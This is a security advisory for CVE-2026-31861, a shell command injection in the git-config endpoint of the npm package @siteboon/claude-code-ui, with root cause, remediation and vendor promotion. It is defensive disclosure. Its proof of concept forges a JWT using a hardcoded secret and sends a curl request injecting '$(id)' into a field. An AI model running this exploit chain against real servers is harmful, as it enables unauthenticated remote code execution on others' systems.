📦 npm

GHSA-7fv4-fmmc-86g2

@siteboon/claude-code-ui is Vulnerable to Shell Command Injection in Git Routes

Also known as CVE-2026-31861
Published
Mar 10, 2026
Updated
Mar 13, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
6.0% probability of exploitation in the next 30 days
92nd percentile; +5.96% change since the previous score; risk band shown: Lower Risk

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

@siteboon/claude-code-ui (npm): 477 downloads / week

Description

Shell Command Injection in User Git Config Endpoint

Severity: High
CVSS 3.1: 8.8 (High) — when chained with VULN-01
CWE: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Attack Vector: Network
Authentication: JWT required (bypassable via VULN-01)
Affected Files: server/routes/user.js (lines 58-59)

Description

The /api/user/git-config endpoint builds shell command lines by interpolating the user-supplied gitName and gitEmail values into strings passed to child_process.exec(), which hands them to /bin/sh. Each value is placed inside double quotes and only the " character is escaped (rewritten to \"). That is not enough: inside a double-quoted string the shell still interprets backticks (`), $() command substitution, and backslash escapes, so an attacker controls what the shell runs.

This allows authenticated attackers to execute arbitrary OS commands via the git configuration endpoint.

Root Cause

server/routes/user.js lines 58-59:

await execAsync(`git config --global user.name "${gitName.replace(/"/g, '\\"')}"`);
await execAsync(`git config --global user.email "${gitEmail.replace(/"/g, '\\"')}"`);

Only " is escaped (rewritten to \"). However, within double-quoted bash strings, the following are still interpreted:

  • `malicious_command` — backtick execution
  • $(malicious_command) — subshell execution
  • \ — backslash escapes; a supplied \" becomes \\" after the replace, which the shell reads as a literal backslash followed by the closing quote, so the remainder of the value is parsed as further shell syntax (for example ; another_command)

Impact

  • Remote Code Execution (RCE) — arbitrary OS commands execute as the Node.js process user
  • The git config --global vector also writes the git configuration of the user running the Node.js process (its ~/.gitconfig), so all git operations performed by that user on the server are affected
  • When chained with VULN-01 (hardcoded JWT secret), this is fully unauthenticated RCE
  • Attacker can: read/write any file the process user can, install backdoors, pivot to other systems, exfiltrate data

Proof of Concept

# Step 1: Forge a JWT (see VULN-01)
TOKEN=$(python3 -c "import jwt; print(jwt.encode({'userId':1,'username':'admin'}, 'claude-ui-dev-secret-change-in-production', algorithm='HS256'))")

# Step 2: Inject via gitName using command substitution
curl -X POST "http://REDACTED:5173/api/user/git-config" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"gitName":"$(id)","gitEmail":"[email protected]"}'

The server executes:

git config --global user.name "$(id)"

The shell that child_process.exec() spawns (/bin/sh) evaluates $(id) before git ever sees the argument, executing the id command and setting user.name to its output. Any command can be substituted for id.

Remediation

Replace exec() with a no-shell API that takes the command as an argv array (child_process.spawn or child_process.execFile); the value then reaches git unchanged, and there is no shell to expand anything. spawnAsync below stands for a promise wrapper around spawn, which the page does not show; util.promisify(child_process.execFile) is an equivalent built-in. Do not pass the shell: true option, which would reintroduce the shell:

// BEFORE (vulnerable): string built from user input, run through /bin/sh
await execAsync(`git config --global user.name "${gitName.replace(/"/g, '\\"')}"`);

// AFTER (safe): argv array, no shell involved, value passed verbatim as one argument
await spawnAsync('git', ['config', '--global', 'user.name', gitName]);
await spawnAsync('git', ['config', '--global', 'user.email', gitEmail]);

Affected Packages

1 total, 1 fixed

Ecosystem: npm
Package: @siteboon/claude-code-ui
Vulnerable range: all versions before 1.24.0
Fix: 1.24.0

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @siteboon/claude-code-ui. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update @siteboon/claude-code-ui to 1.24.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7fv4-fmmc-86g2 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-7fv4-fmmc-86g2 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-7fv4-fmmc-86g2. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

O3 Security · Impact-Aware SCA

Is GHSA-7fv4-fmmc-86g2 in your dependencies?

O3 detects GHSA-7fv4-fmmc-86g2 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.